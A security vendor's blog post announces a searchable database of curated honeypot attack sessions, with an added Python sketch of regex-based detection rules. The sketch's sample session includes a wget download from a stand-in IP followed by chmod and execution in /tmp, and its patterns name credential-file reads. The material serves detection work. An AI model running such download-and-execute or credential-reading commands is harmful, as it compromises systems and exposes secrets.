Introducing the Attack Session Database: Raw Honeypot Sessions, Searchable and Annotated

We've been capturing attacker behavior across 15+ protocols since we launched. Millions of events per day: every credential attempt, every command, every query, recorded and processed by our sensor network. Until now, that data lived exclusively behind our API and internal tooling.
Today we're making raw attack sessions available in a new public-facing database at /sessions. It's in beta, it's searchable, and every session is individually curated before publication.
What You're Looking At
Each entry in the database is a complete attack session captured by one of our honeypot sensors. A session starts when an attacker connects and ends when they disconnect or time out. Everything they do in between (authentication attempts, commands executed, queries run, files requested) is recorded as a sequence of events.
Here's what a published session includes:
- Protocol: which service the attacker targeted (SSH, HTTP, MySQL, Redis, Docker, FTP, SMTP, PostgreSQL, MongoDB, SMB, Telnet, and more)
- Events: the full sequence of attacker inputs in order, with timestamps
- Behavioral analysis: if the session matches a known attack pattern, it's labeled with a behavior name, description, and risk level
- Matched primitives: individual attack indicators detected within the session, linked to the specific events that triggered them
- Duration: how long the session lasted
Sessions are displayed in an event viewer that lets you step through exactly what the attacker did. If primitives matched, you can click them to highlight the corresponding events.
What Behavioral Analysis Means Here
Our backend runs a two-tier detection system against every session:
Primitives are atomic pattern matches: a single rule that fires against a single event field. For example, a primitive might match any SSH command containing wget http: or any MySQL query with a UNION SELECT pattern. Each primitive has a name and a description that explains what it detects.
Behaviors are composed of primitives. A behavior defines a complete attack chain. For instance, "download and execute" requires both a download primitive (wget or curl) and an execution primitive to match in the same session. When a behavior matches, the session gets a risk level: critical, high, medium, low, or info.
Not every session triggers a behavior match. Some sessions are simple credential sprays where an attacker tries root/admin and disconnects. Those sessions still have value as data points, but they won't carry a behavior label.
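As an added illustration of the two-tier model (this is not sikkerapi's code and the post does not show its real rule syntax), here is a small Python version: each primitive is one regex against one event field, and a behavior fires only when every primitive it requires matched somewhere in the same session. The event field names, the rule patterns and the sample session are all constructed assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample session (not real sensor data); the event field names are
# an assumption, not the database's real schema.
SAMPLE_SESSION = {
    "protocol": "SSH",
    "events": [
        {"type": "auth", "username": "root", "password": "123456", "success": False},
        {"type": "auth", "username": "root", "password": "admin", "success": True},
        {"type": "command", "input": "uname -a"},
        {"type": "command", "input": "wget http://198.51.100.7/x.sh -O /tmp/x.sh"},
        {"type": "command", "input": "chmod +x /tmp/x.sh && /tmp/x.sh"},
    ],
}

@dataclass(frozen=True)
class Primitive:            # one rule: one regex against one event field
    name: str
    field: str
    pattern: re.Pattern

@dataclass(frozen=True)
class Behavior:             # an attack chain: every listed primitive must fire
    name: str
    risk: str               # critical / high / medium / low / info
    requires: tuple

PRIMITIVES = [
    Primitive("http_download", "input", re.compile(r"\b(wget|curl)\s+\S*https?://", re.I)),
    Primitive("execute_tmp_file", "input", re.compile(r"\bchmod\s+\+x\b|(^|;|&&|\|\|)\s*/tmp/\S+")),
    Primitive("credential_file_access", "input", re.compile(r"\bcat\s+/etc/(passwd|shadow)\b")),
]
BEHAVIORS = [
    Behavior("download_and_execute", "critical", ("http_download", "execute_tmp_file")),
    Behavior("credential_file_access", "high", ("credential_file_access",)),
]

def match_primitives(session):
    """Map each primitive that fired to the indexes of the events that triggered it."""
    hits = {}
    for idx, event in enumerate(session["events"]):
        for prim in PRIMITIVES:
            value = event.get(prim.field)
            if isinstance(value, str) and prim.pattern.search(value):
                hits.setdefault(prim.name, []).append(idx)
    return hits

def match_behaviors(primitive_hits):
    """A behavior matches only when all of its primitives fired in the same session."""
    return [(b.name, b.risk) for b in BEHAVIORS if all(p in primitive_hits for p in b.requires)]
```

The event indexes kept per primitive are what lets a viewer highlight the triggering events, and a session whose only hit is the download primitive gets no behavior label, just as the post describes for partial matches.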
You can explore the full catalog of primitives and behaviors we detect at /threats/catalog.
Search and Filtering
The database supports full-text search across:
- Publication IDs: every session has a unique ID in the format PUB-YYYY-MMDD-NNNN
- Behavior names: search for attack patterns like "downloadandexecute" or "credentialfileaccess"
- Primitive names: find sessions that triggered specific detection rules
- Raw event data: search for actual commands, queries, URLs, and payloads that appeared in sessions
You can also filter by protocol and sort by newest, oldest, longest duration, or highest primitive count.
This means you can search for something like cat /etc/passwd and find every published session where an attacker ran that command. Or search for UNION SELECT to find SQL injection sessions. Or filter to Docker and sort by primitive count to find the most complex container exploitation chains.
What Gets Published
Not every session we capture ends up in the database. Sessions are curated and reviewed before publication. The process:
- Our team selects sessions that demonstrate interesting or representative attack behavior
- Each session is reviewed and sanitized. Honeypot response data is stripped to prevent fingerprinting our sensors, and sensitive fields can be redacted
- The sanitized session is published with its behavioral analysis and primitive matches
This means the database is not a firehose of raw logs. It's a curated collection of sessions chosen because they illustrate real attacker techniques across different protocols.
Access and Rate Limits
The database is free to access during the beta period:
- Without an account: 5 session lookups per day
- With a free account: Unlimited access to the full database during the beta
There's no paywall on the data. The daily limit for unauthenticated users exists to prevent automated scraping, not to restrict legitimate use. Creating an account takes 30 seconds and removes the limit entirely.
You can register here for free.
Protocol Coverage
Sessions are available across every protocol our sensors support:
| Protocol | What's captured |
|---|---|
| SSH | Credential attempts, shell commands, file downloads |
| HTTP | Request methods, paths, query strings, POST bodies |
| MySQL | SQL queries, authentication attempts |
| PostgreSQL | SQL queries, database selection |
| Redis | AUTH commands, data manipulation commands |
| Docker | Container creation, exec commands, API calls |
| FTP | Login attempts, file operations |
| SMTP | Mail relay attempts, sender/recipient enumeration |
| MongoDB | Database queries, authentication |
| SMB | Share access attempts, file operations |
| Telnet | Credential attempts, shell commands |
| MSSQL | SQL queries, authentication attempts |
| IMAP | Credential attempts, mailbox access |
| Elasticsearch | Index queries, cluster API calls |
| RTSP | Stream requests, authentication attempts |
| SIP | Registration attempts, call setup requests |
More protocols will appear in the database as we publish sessions from our full sensor coverage.
Why We Built This
Our API provides comprehensive IP reputation scoring, behavioral classification, geolocation, risk assessment, and detection across 15+ protocols. It's built for automated integration: block malicious IPs, enrich SIEM alerts, monitor your infrastructure in real time.
The session database adds a different dimension. Instead of querying what an IP did, you can see exactly how an attack unfolded: the full sequence of commands, queries, and payloads from connection to disconnect. Researchers get real attack data to study. Security teams get concrete examples of what threats look like across different protocols. Detection engineers can search for specific techniques to understand how they're used in the wild.
What's Next
This is a beta launch. The database will grow as we publish more sessions across more protocols. We're prioritizing variety, with sessions that demonstrate different attack techniques, different protocols, and different levels of sophistication.
The session viewer, search functionality, and filtering are all functional but will continue to improve based on how people actually use the database.
Browse the database: sikkerapi.com/sessions
Detection catalog: sikkerapi.com/threats/catalog
Create a free account here.